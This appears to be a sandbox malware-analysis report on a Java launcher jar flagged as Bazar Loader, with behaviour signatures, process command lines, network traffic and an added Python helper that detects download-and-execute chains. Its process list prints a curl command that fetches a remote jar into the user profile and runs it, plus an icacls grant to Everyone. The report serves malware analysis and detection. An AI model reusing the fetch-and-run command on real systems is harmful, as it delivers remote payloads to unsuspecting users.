Analysis Overview
SHA256
97bf913d6017cb86c893aea40352a8494e3f91fd49c71bad4238d0d8a494bb4e
Threat Level: Known bad
The file FlexStarter.jar was found to be: Known bad.
Malicious Activity Summary
Bazar Loader
Bazar/Team9 Loader payload
Modifies file permissions
Drops file in Program Files directory
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-23 09:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-23 09:08
Reported
2024-04-23 09:16
Platform
win7-20240221-en
Max time kernel
357s
Max time network
361s
Command Line
Signatures
Processes
C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\FlexStarter.jar
Network
Files
memory/1624-9-0x00000000020E0000-0x00000000050E0000-memory.dmp
memory/1624-11-0x0000000000220000-0x0000000000221000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-23 09:08
Reported
2024-04-23 09:15
Platform
win10v2004-20240412-en
Max time kernel
415s
Max time network
416s
Command Line
Signatures
Bazar Loader
Bazar/Team9 Loader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133583369382177748" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\FlexStarter.jar
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0581ab58,0x7ffb0581ab68,0x7ffb0581ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0581ab58,0x7ffb0581ab68,0x7ffb0581ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1936,i,16685398875077309238,11063309328838788079,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1936,i,16685398875077309238,11063309328838788079,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4180 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5080 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4168 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4996 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4324 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5468 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2536 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\start_flex.bat" "
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar" "https://launcher.flexmc.wtf/bootstrap/bootstrap.jar"
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe
javaw -jar "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4368 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:2
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\.flex\hs_err_pid3796.log
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar"
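Added triage helper, not part of the sandbox output. The process list above is flat: the report does not show parent/child links, so the script below treats report order as execution order (an assumption) and pairs the curl download into a user-writable directory with every later `-jar` execution of the same path. It also surfaces the icacls grant; that call targets the JRE's usage-tracker directory, which is Oracle launcher behaviour rather than something the jar itself does, so it is listed for the analyst to dismiss instead of being scored as a finding. The sample command lines are copied from the process list; the user-writable prefixes and image-name matching are the helper's own heuristics.

```python
"""Added triage helper, not part of the sandbox output: reconstruct the
download-and-execute chain from the process command lines above."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: command lines from the behavioral2 process list, kept in
# report order. The report does not show parent/child links, so list order
# stands in for execution order (an assumption of this helper).
SAMPLE_CMDLINES = [
    r'java -jar C:\Users\Admin\AppData\Local\Temp\FlexStarter.jar',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
    r'C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M',
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\start_flex.bat" "',
    r'curl -o "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar" "https://launcher.flexmc.wtf/bootstrap/bootstrap.jar"',
    r'javaw -jar "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar"',
    r'"C:\Windows\system32\taskmgr.exe" /4',
    r'"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar"',
]

# Directories a standard user can write to (assumed list); a payload staged
# here needs no elevation to be dropped and run.
USER_WRITABLE_PREFIXES = ('c:\\users\\', 'c:\\programdata\\')


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted runs together."""
    return [t.replace('"', '').strip() for t in re.findall(r'(?:"[^"]*"|\S)+', cmdline)]


def image_name(cmdline: str) -> str:
    """Lower-case executable name without directory or .exe suffix."""
    name = tokens(cmdline)[0].rsplit('\\', 1)[-1].lower()
    return name[:-4] if name.endswith('.exe') else name


def curl_download(cmdline: str) -> Optional[Tuple[str, str]]:
    """(output_path, url) for a curl call that writes a URL to a file, else None."""
    if image_name(cmdline) != 'curl':
        return None
    toks = tokens(cmdline)
    out = url = None
    for i, t in enumerate(toks):
        if t in ('-o', '--output') and i + 1 < len(toks):
            out = toks[i + 1]
        elif t.lower().startswith(('http://', 'https://')):
            url = t
    return (out, url) if out and url else None


def jar_executed(cmdline: str) -> Optional[str]:
    """Path passed to java/javaw -jar, else None."""
    if image_name(cmdline) not in ('java', 'javaw'):
        return None
    toks = tokens(cmdline)
    for i, t in enumerate(toks):
        if t.lower() == '-jar' and i + 1 < len(toks):
            return toks[i + 1]
    return None


def is_user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def find_download_execute_chains(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Pair each curl download into a user-writable path with every later
    java/javaw -jar execution of that same path (case-insensitive)."""
    findings = []
    for i, cmd in enumerate(cmdlines):
        dl = curl_download(cmd)
        if dl is None or not is_user_writable(dl[0]):
            continue
        path, url = dl
        execs = [j for j in range(i + 1, len(cmdlines))
                 if (jar_executed(cmdlines[j]) or '').lower() == path.lower()]
        if execs:
            findings.append({'url': url, 'path': path,
                             'download_index': i, 'exec_indices': execs})
    return findings


def icacls_everyone_grants(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """(target, rights) for every icacls /grant that names the Everyone group."""
    grants = []
    for cmd in cmdlines:
        toks = tokens(cmd)
        if image_name(cmd) != 'icacls' or '/grant' not in toks:
            continue
        k = toks.index('/grant')
        spec = toks[k + 1] if k + 1 < len(toks) else ''
        principal, _, rights = spec.partition(':')
        if principal.lower() == 'everyone':
            grants.append((toks[1], rights))
    return grants


if __name__ == '__main__':
    for f in find_download_execute_chains(SAMPLE_CMDLINES):
        print(f"download {f['url']} -> {f['path']} executed at indices {f['exec_indices']}")
    for target, rights in icacls_everyone_grants(SAMPLE_CMDLINES):
        print(f'Everyone granted {rights} on {target}')
```

Against the sample, the helper reports one chain: the curl write to `%APPDATA%\.flex\bootstrap.jar` followed by two `javaw -jar` executions of that path (the javapath shim and the full JRE path), plus the Everyone:(OI)(CI)M grant on the JRE usage directory. Feeding it real process-creation telemetry with parent PIDs would replace the ordering assumption with actual lineage.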
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.213.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| GB | 216.58.213.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.180.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 216.58.212.206:443 | clients2.google.com | udp |
| GB | 216.58.212.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 56.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.33.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | flexmc.com.tr | udp |
| US | 172.67.204.160:443 | flexmc.com.tr | tcp |
| US | 172.67.204.160:443 | flexmc.com.tr | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 172.67.204.160:443 | flexmc.com.tr | udp |
| US | 8.8.8.8:53 | 160.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.17.3.184:443 | challenges.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.3.184:443 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.3.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.173.246.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | use.fontawesome.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.21.27.152:443 | use.fontawesome.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.termsfeed.com | udp |
| US | 104.26.7.160:443 | www.termsfeed.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | mcapi.us | udp |
| US | 8.8.8.8:53 | minotar.net | udp |
| US | 104.21.80.187:443 | mcapi.us | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 8.8.8.8:53 | 160.7.26.104.in-addr.arpa | udp |
